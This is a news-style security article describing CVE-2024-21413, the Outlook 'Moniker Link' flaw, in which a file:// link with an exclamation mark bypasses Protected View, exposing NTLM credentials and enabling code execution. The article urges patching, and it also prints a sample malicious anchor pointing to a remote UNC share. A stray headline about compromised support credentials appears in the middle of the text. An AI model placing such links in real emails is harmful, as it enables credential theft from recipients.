CVE-2024-21413 (CVSS 9.8): Microsoft Outlook Remote Code Execution Vulnerability

Microsoft has issued a warning to users about a critical vulnerability in its Office suite that permits unauthorized malefactors to execute malicious code.

The vulnerability, uncovered by Check Point, has been designated CVE-2024-21413. It is triggered upon opening emails containing malevolent links in vulnerable versions of Outlook.

Particularly perilous is the fact that the flaw enables hackers to circumvent the “Protected View” feature, intended to block malicious content in Office files. Instead of opening dangerous files in a read-only mode, they are initiated in an editing mode.

Hackers compromised support agent’s credentials

According to the company’s statements, attacks utilizing CVE-2024-21413 can be conducted remotely, without user interaction, and the complexity of such attacks remains low for hackers.

Successful exploitation of this vulnerability would allow an attacker to bypass the Office Protected View and open in editing mode rather than protected mode,” Microsoft’s announcement states.

The vulnerability affects several Office products, including Microsoft Office LTSC 2021, and Microsoft 365 for enterprises, as well as Microsoft Outlook 2016 and Microsoft Office 2019 (which are in extended support).

Check Point, in their report, explains that the vulnerability, which they have named “Moniker Link,” allows circumventing Outlook’s built-in defenses against malicious links embedded in emails, by using the file:// protocol to access a remote server of malefactors.

Adding an exclamation mark immediately after the document extension allows bypassing Outlook’s security restrictions. In this case, clicking on the link causes the application to access a remote resource and open the target file without displaying warnings or errors.

*<a href="file:///\\\test\test.rtf!something">CLICK ME</a>*

The vulnerability emerged due to the use of the insecure API MkParseDisplayName, which could also affect other software utilizing it.

As a result of the successful exploitation of CVE-2024-21413, there is a potential for the theft of NTLM credential information and the execution of arbitrary code through maliciously crafted Office documents.

Check Point recommends all Outlook users apply the official security update as soon as possible, which, fortunately, is already available.